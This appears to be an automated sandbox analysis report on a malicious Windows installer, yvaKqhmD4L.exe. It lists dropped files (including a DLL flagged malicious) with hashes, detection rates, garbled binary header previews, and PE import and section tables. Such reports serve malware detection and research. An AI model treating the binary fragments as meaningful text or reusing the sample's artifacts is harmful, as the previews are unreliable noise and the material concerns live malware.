                                            Preview:.X.m...Z...vaX.%....%2.-......@$....-9.T=..f...E.0e....!G7....u.?.z..P.kvE..3....7[+......A....+xJ.......7..*.i.q8.OC.[ac..qs ....,9kV.@.px.Ye..`.....o...ol.7...[....k.[[w..^|.A........o+u.y.|.t.hN:Y....Z.G...x.I.Z+.Z...r....#.4pZ.....*$..X`.W....:.=.........0..i"R.k..1..q.....4..i.U...t.q$.W\... l........(vsBs.*Q..o.M@.;..Qd.....v...B..*..U.@.J^..s....!.j1f.6.h?.....B..S..3.y...:.a.V.....mP.....1n..#I...^.y..o.......J.*5..U...,.Y.Q.Pc.}=.&/.Gt.1.:....E...K.iB6.,.BG.r...5.Q.\...)g*i..5.O.]|\.<.;i..R....d!..q./B n(..j>..hD..... $2.9+H.....6.....~(.^.K.4Ed.......s.A....5..v,.y(...h.8....=.P.DM......../......Go..'.w&.........(h|..#..9D;qt.....Y%.v:..5c.6..........6a..`.p.....*y.(.1GC>.f.Z.1...[.r.X|.....q..z......\F.. ..H.....Q.c.r..^I...1.1b.U0..r4e. .<..kY..2' ._.....U.....T......m...a*..'_.Y.E..gb.....g....LL.%VmaN6[..C+.....4Y.S.s${.B.....-....,..6.N..N...b.{.x..u......h....J;W.=eY...H..pE{.......D1.J@.uhLx..%...f4.:oO-.^T#..vi.+.c~.x..B..

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:Nlllul7got/Z:NllUkot
                                            MD5:71995B6B43EA2A2D49079E9E99E8D184
                                            SHA1:A55CE57E044A814007D3EE7DCCF1527EF391036A
                                            SHA-256:FD011C1349ABA970E984930A34129F61F60BF70A92E4E1748C4DCFFA3E22DFBF
                                            SHA-512:6CFBFC9B41995E53733EDCEC9747C4B7EA800D267145D6A879637CBC2B96E06C1D8CFEE9CDC59A6E57A32AEFE5A941448A029B16F4B2A11EF8CC0F579352509A
                                            Malicious:false
                                            Preview:@...e................................................@..........

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4hqoyw4e.gzm.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gp3urvnq.zah.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m41ooamn.0mv.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xxnggcxw.b4v.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\_isetup\_setup64.tmp

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp
                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):6144
                                            Entropy (8bit):4.720366600008286
                                            Encrypted:false
                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\update.vbc

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):3621376
                                            Entropy (8bit):7.006090025798393
                                            Encrypted:false
                                            SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                                            MD5:FCADEAE28FCC52FD286350DFEECD82E5
                                            SHA1:48290AA098DEDE53C457FC774063C3198754A161
                                            SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                                            SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 26%
                                            • Antivirus: Virustotal, Detection: 38%, Browse
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp

                                            Download File
                                            Process:C:\Users\user\Desktop\yvaKqhmD4L.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):3366912
                                            Entropy (8bit):6.530560312986899
                                            Encrypted:false
                                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                            MD5:6AD6576147BC6B91DD40240772510F4F
                                            SHA1:CB2F08863C6B55BE0B2FD9DE6A5E23EA3C970D4A
                                            SHA-256:4C6EAB302E63581D03D10FCC2DBA9BC17CE2320EC374615F5F6FFDDA7FF91928
                                            SHA-512:B9F95CC0B83706AEAEEEE59854402F3D6C8F8418C0AB2534212BFBA117460BA3EEA07DC1A928E204EBFC1F79508A088C5618B33F8B39AE1FF923172E3266363C
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Virustotal, Detection: 2%, Browse
                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                                            C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\_isetup\_setup64.tmp

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):6144
                                            Entropy (8bit):4.720366600008286
                                            Encrypted:false
                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\update.vbc

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):3621376
                                            Entropy (8bit):7.006090025798393
                                            Encrypted:false
                                            SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                                            MD5:FCADEAE28FCC52FD286350DFEECD82E5
                                            SHA1:48290AA098DEDE53C457FC774063C3198754A161
                                            SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                                            SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 26%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp

                                            Download File
                                            Process:C:\Users\user\Desktop\yvaKqhmD4L.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):3366912
                                            Entropy (8bit):6.530560312986899
                                            Encrypted:false
                                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                            MD5:6AD6576147BC6B91DD40240772510F4F
                                            SHA1:CB2F08863C6B55BE0B2FD9DE6A5E23EA3C970D4A
                                            SHA-256:4C6EAB302E63581D03D10FCC2DBA9BC17CE2320EC374615F5F6FFDDA7FF91928
                                            SHA-512:B9F95CC0B83706AEAEEEE59854402F3D6C8F8418C0AB2534212BFBA117460BA3EEA07DC1A928E204EBFC1F79508A088C5618B33F8B39AE1FF923172E3266363C
                                            Malicious:true
                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                                            \Device\ConDrv

                                            Download File
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:ASCII text, with CRLF, CR line terminators
                                            Category:dropped
                                            Size (bytes):406
                                            Entropy (8bit):5.117520345541057
                                            Encrypted:false
                                            SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                            MD5:9200058492BCA8F9D88B4877F842C148
                                            SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                            SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                            SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                            Malicious:false
                                            Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.9395959272699885
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 98.04%
                                            • Inno Setup installer (109748/4) 1.08%
                                            • InstallShield setup (43055/19) 0.42%
                                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                            File name:yvaKqhmD4L.exe
                                            File size:6'745'048 bytes
                                            MD5:17ae5643e60881d69e3e25122ca1fc67
                                            SHA1:ab0e0bec78013e6406148f1dbc527756af31e988
                                            SHA256:def808bed70d77ec70f201b7f9edc125295d26128df9e7e1796311742fc0d00a
                                            SHA512:c824e794281760ebe6a5d3945c09f0df87706a4c253994d111f842ae0b5d93950b9afe40b5f19afd80e7b2e81c4474ad825f61b3d722b0236181da34e9e726b5
                                            SSDEEP:98304:XwREcprT7QWG+nv/e5278iPYuHUtFdghxOdVig1QxqQNDhA62sSZNXbIAdMwZgg:lcp1G+v/e5wXHPmVlQAQNHSZNMG/
                                            TLSH:84661213F2CBD43EF05E0B3B15B2A55484FBBA616922AD5286ECB4ECCE354601D3E647
                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                            File Icon

                                            Icon Hash:0c0c2d33ceec80aa

                                            Static PE Info

                                            General

                                            Entrypoint:0x4a83bc
                                            Entrypoint Section:.itext
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:6
                                            OS Version Minor:1
                                            File Version Major:6
                                            File Version Minor:1
                                            Subsystem Version Major:6
                                            Subsystem Version Minor:1
                                            Import Hash:40ab50289f7ef5fae60801f88d4541fc

                                            Entrypoint Preview

                                            Instruction
                                            push ebp
                                            mov ebp, esp
                                            add esp, FFFFFFA4h
                                            push ebx
                                            push esi
                                            push edi
                                            xor eax, eax
                                            mov dword ptr [ebp-3Ch], eax
                                            mov dword ptr [ebp-40h], eax
                                            mov dword ptr [ebp-5Ch], eax
                                            mov dword ptr [ebp-30h], eax
                                            mov dword ptr [ebp-38h], eax
                                            mov dword ptr [ebp-34h], eax
                                            mov dword ptr [ebp-2Ch], eax
                                            mov dword ptr [ebp-28h], eax
                                            mov dword ptr [ebp-14h], eax
                                            mov eax, 004A2EBCh
                                            call 00007EFC590239A5h
                                            xor eax, eax
                                            push ebp
                                            push 004A8AC1h
                                            push dword ptr fs:[eax]
                                            mov dword ptr fs:[eax], esp
                                            xor edx, edx
                                            push ebp
                                            push 004A8A7Bh
                                            push dword ptr fs:[edx]
                                            mov dword ptr fs:[edx], esp
                                            mov eax, dword ptr [004B0634h]
                                            call 00007EFC590B532Bh
                                            call 00007EFC590B4E7Eh
                                            lea edx, dword ptr [ebp-14h]
                                            xor eax, eax
                                            call 00007EFC590AFB58h
                                            mov edx, dword ptr [ebp-14h]
                                            mov eax, 004B41F4h
                                            call 00007EFC5901DA53h
                                            push 00000002h
                                            push 00000000h
                                            push 00000001h
                                            mov ecx, dword ptr [004B41F4h]
                                            mov dl, 01h
                                            mov eax, dword ptr [0049CD14h]
                                            call 00007EFC590B0E83h
                                            mov dword ptr [004B41F8h], eax
                                            xor edx, edx
                                            push ebp
                                            push 004A8A27h
                                            push dword ptr fs:[edx]
                                            mov dword ptr fs:[edx], esp
                                            call 00007EFC590B53B3h
                                            mov dword ptr [004B4200h], eax
                                            mov eax, dword ptr [004B4200h]
                                            cmp dword ptr [eax+0Ch], 01h
                                            jne 00007EFC590BC09Ah
                                            mov eax, dword ptr [004B4200h]
                                            mov edx, 00000028h
                                            call 00007EFC590B1778h
                                            mov edx, dword ptr [004B4200h]

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            .rsrc0xcb0000x110000x11000cd57d4944380f39f42e90208620a1decFalse0.18764361213235295data3.722093950297349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                            RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                            RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                            RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                            RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                            RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                            RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                            RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                            RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                            RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                            RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                            RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                            RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                            RT_STRING0xd8e000x3f8data0.3198818897637795
                                            RT_STRING0xd91f80x2dcdata0.36475409836065575
                                            RT_STRING0xd94d40x430data0.40578358208955223
                                            RT_STRING0xd99040x44cdata0.38636363636363635
                                            RT_STRING0xd9d500x2d4data0.39226519337016574
                                            RT_STRING0xda0240xb8data0.6467391304347826
                                            RT_STRING0xda0dc0x9cdata0.6410256410256411
                                            RT_STRING0xda1780x374data0.4230769230769231
                                            RT_STRING0xda4ec0x398data0.3358695652173913
                                            RT_STRING0xda8840x368data0.3795871559633027
                                            RT_STRING0xdabec0x2a4data0.4275147928994083
                                            RT_RCDATA0xdae900x10data1.5
                                            RT_RCDATA0xdaea00x310data0.6173469387755102
                                            RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                                            RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                                            RT_VERSION0xdb2980x584dataEnglishUnited States0.273371104815864
                                            RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                                            Imports

                                            DLLImport
                                            kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                            comctl32.dllInitCommonControls
                                            user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                            oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                            advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

                                            Exports

                                            NameOrdinalAddress
                                            __dbk_fcall_wrapper20x40fc10
                                            dbkFCallWrapperAddr10x4b063c

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            No network behavior found

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

